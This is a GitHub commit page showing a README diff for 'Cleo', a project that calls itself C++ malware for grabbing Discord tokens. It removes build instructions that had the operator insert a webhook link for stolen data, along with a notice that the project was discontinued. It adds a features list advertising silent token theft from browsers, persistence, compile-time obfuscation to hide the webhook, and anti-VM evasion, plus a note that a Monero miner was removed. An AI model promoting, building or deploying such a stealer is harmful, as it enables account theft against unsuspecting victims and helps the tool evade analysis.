Skip to content

Commit f9fb4ce

Browse files
authored
Update README.md
1 parent 98d1157 commit f9fb4ce

1 file changed

Lines changed: 15 additions & 19 deletions

File tree

README.md

Lines changed: 15 additions & 19 deletions
Original file line numberDiff line numberDiff line change
@@ -6,32 +6,28 @@
66

77
</p>
88

9-
A piece of C++ malware, grabs discord tokens and numerous other things.
9+
A piece of C++ malware, grabs discord tokens and numerous other things.
1010

11-
#### Notice: This project is now private, this has been swiftly discontinued for the general public.
12-
#### Why? Because with great power comes great responsibility. a lot of people on here should not have access to anything like this.
11+
<img src="https://img.shields.io/github/stars/Passive/Cleo?style=for-the-badge">
12+
13+
# Update notes
14+
- Used to contain a monero miner but has since been removed due to lack of purpose.
15+
- Now uses obfuscation from https://github.com/adamyaxley/Obfuscate in order to hide your webhook upon disassembly.
16+
- Made some code cleaner
17+
- Added more comments
18+
- Made a couple new files
19+
- Updated antivm.h
1320

1421
# Features
1522

1623
Features | Description
1724
-------- | -----------
18-
Silence | Completely silent data collection
25+
Silence | Completely silent, out of sight, out of mind.
1926
Persistence | Virus is persistent
20-
Browser collection | Collect from browsers
21-
Made in C++ | Made using C++
22-
Updateable | Fully open source
23-
24-
# Compilation
25-
26-
You will need **Visual Studio 2019** and Visual C++ SDK installed.
27-
28-
Download the .zip archive from releases, extract it to a folder `e.g: MyProjectFolder`
29-
Next, open the .sln file and once loaded go to the `Source.cpp` file, then find the webhook link
30-
inside of the sprintf call and change it to desired link.
31-
32-
**Make sure you are using "Release" not "Debug" when compiling!**
33-
34-
Press ctrl + b and enjoy!
27+
Browser collection | Collect auth tokens from browsers
28+
Transparent | Fully open source
29+
Obfuscation | Automatic compile-time obfuscation
30+
AntiVM | Prompts an error when executing on a VM
3531

3632
# Contributing
3733

0 commit comments

Comments
 (0)